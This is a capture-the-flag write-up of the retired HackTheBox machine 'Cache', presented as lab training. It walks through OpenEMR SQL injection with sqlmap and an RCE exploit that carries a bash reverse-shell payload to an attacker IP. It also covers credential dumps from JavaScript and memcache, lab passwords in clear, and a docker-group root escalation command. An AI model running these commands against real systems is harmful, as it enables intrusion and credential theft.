Cache is a retired vulnerable Linux machine available from HackTheBox. The machine maker is ASHacker, thank you. It has an Medium difficulty with a rating of 5 out of 10.
Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. The goal is to obtain root shell together with both user & root flags.
Exploitation Summary (tap to reveal)
Initial Exploitation
- Vulnerability: Credentials exposure through SQL Injection and then Remote Code Execution via OpenEMR
- Explanation: OpenEMR software has multiple vulnerabilities. SQL Injection on page add_edit_event_user.php gets us the credentials needed to exploit Remote Code Execution vulnerability
Lateral Movement – from www-data
- Vulnerability: Credentials exposure through web file
- Explanation: Credentials are exposed on javascript file functionality.js
Lateral Movement – from ash
- Vulnerability: Credentials exposure through memcache
- Explanation: Credentials are stored in cache service memcache.
Privilege Escalation
- Vulnerability: Docker group vulnerability
- Explanation: A docker vulnerability allows user of member docker to break out of docker container and gain access as root
Enumeration
nmap -p- -A -T4 10.10.10.188
TCP 22: OpenSSH 7.6p1 TCP 80: Apache httpd 2.4.29
Initial Exploitation
Only 2 ports are open: SSH & HTTP website. Most likely port 80 would be where we find information & vulnerabilities to get in. So let’s see what we have here:
The website talks about hacking. Following links to check out other webpages show 2 pages that are intersting: login.html & author.html. Let’s look at them 1 by 1.
When I look at the source code of the page, it shows that the login request would be sent to net.html. Also, there’s a javascript file called functionality.js. Let’s check out net.html first.
That’s interesting, typically .html files are static and would not be able to process request. Let’s try to access it directly.
It redirects back to login.html. But if you try to access it using view-source:, you can see the source code of net.html (of course you can also use curl)
It is a simple page that shows an image:
That’s a cool image but other than that login.html doesn’t lead us to more interesting things. Now take a look at functionality.js:
This javascript reveals that the login credentials and validation are hard coded in the file. We can find user ash with password H@v3_fun. Using the credentials to login brings us to net.html page. A quick run of the credentials at SSH has failed. That’s about as far as we can go from this. But we do find some credentials that may be useful later on.
Let’s check the other web page author.html
This page shows CEO name ASH, domain name cache.htb and some interesting projects Cache & HMS. So ash could be a valid user of the system and the machine can possibly have virtual hosts including cache.htb.
I then add cache.htb to /etc/hosts to see if it would resolve to a different website. But unfortunately, it returns the same webpage.
Next is to try finding any sub-domains using gobuster:
gobuster vhost -u http://cache.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | grep -v "Status: 400"
I use grep -v to exclude sub-domains that return Bad Request 400 error. Those are not valid sub-domains. The search does not return any valid sub-domains. Next is trying to find another valid domain. To do that, I add htb to /etc/hosts and run another gobuster scan:
gobuster vhost -u http://htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | grep -v "Status: 400"
Great! We finally find another valid domain hms.htb. HMS (Hospital Management System) is another project author Ash is working on. Let’s check it out:
It brings us to a new website showing OpenEMR login screen. Credentials we obtained do not work here. We will ask Google for help to see if OpenEMR has any vulnerabilities.
The first vulnerability I find is Remote Code Execution, exactly what we need. But we need credentials to execute this exploit. Looks like we need to find some valid credentials first.
The 2nd highlighted links bring us to a pdf file listing a bunch of OpenEMR’s vulnerabilities. Based on section 2, we can access some URLs without authentication simply by navigating to registration page of the Patient Portal. Then section 3 listed some URLs that are vulnerable to SQL Injection.
URLs that are affected by both section 2 & 3 are:
- add_edit_event_user.php
- find_appt_popup_user.php
- get_profile.php
And based on the information, /portal is the Patient Portal page. Let’s see:
Yup. Able to access Patient Portal. The credentials doesn’t work here either. Anyway, let’s follow the instructions to exploit SQL Injection vulnerabilities. I go with the first URL:
http://hms.htb/portal/add_edit_event_user.php?eid=1
When I enter the URL, it brings me back to the login page. It’s a protected page but we can bypass protection by clicking on the Register button, as described in section 2 of the pdf file.
We are greeted with a Query Error. Sounds good. I would now use sqlmap to test the vulnerability. To successfully run the test, we need the cookie:
- press F12 on FireFox
- at debug console, click Console
- type document.cookie
Now run the sqlmap test:
sqlmap --cookie="PHPSESSID=327f74o2sjv7t5spbpqmkd0fuv" -u http://hms.htb/portal/add_edit_event_user.php?eid=1
Test result confirms that the URL is vulnerable to SQL Injection. After trying out different sqlmap tests, I am able to retrieve more credentials through SQL Injection:
sqlmap --cookie="PHPSESSID=327f74o2sjv7t5spbpqmkd0fuv" -u http://hms.htb/portal/add_edit_event_user.php?eid=1 --dump -T users_secure -C username,password,salt
Sweet! Time to call out John to get me the password:
We find OpenEMR credentials: openemr_admin:xxxxxx
We can now go back to the Remote Code Execution vulnerability and try to obtain a shell. The exploit is available as 45161.py at searchsploit. We first start netcat listening to port 4000:
nc -nvlp 4000
Then execute the exploit as follow:
python 45161.py -u openemr_admin -p xxxxxx -c "bash -i >& /dev/tcp/10.10.14.35/4000 0>&1" http://hms.htb
Initial shell obtained.
Lateral Movement – from www-data
A quick check at /etc/passwd shows that ash is a valid user and we are able to login as ash using the initial credentials (H@v3_fun) obtained.
Great! We gain access as ash and also obtain the user flag!
Lateral Movement – from ash
When checking out the /etc/passwd, we also notice that there is another user catching my eyes: memcache. memcache is a software to provide in-memory caching using port 11211. Looking at the listening ports confirms that memcache service is running:
netstat -na
We can use telnet to connect to memcache service. After playing with the service for a bit, I am able to dump another set of credentials using the following command in memcache:
stats cachedump 1 0 get user get passwd
Password for user luffy obtained: 0n3_p1ec3. With this credentials, I am able to login using SSH.
Gain access as luffy!
Privilege Escalation
A quick check on user luffy shows that luffy is a member of group docker.
This is not a normal group a typical user will be a member of. A quick search on Google shows that it’s possible to perform privilege escalation as a member of group docker.
GTFOBins is an awesome website showing you privilege escalation techniques for different softwares/tools.
Awesome. By using docker image ls command, I am able to find the docker image I can take advantage of and then modify and execute the privilege escalation command brings me to root shell:
docker image ls docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
Perfect! We gain access as root and obtain the root flag!
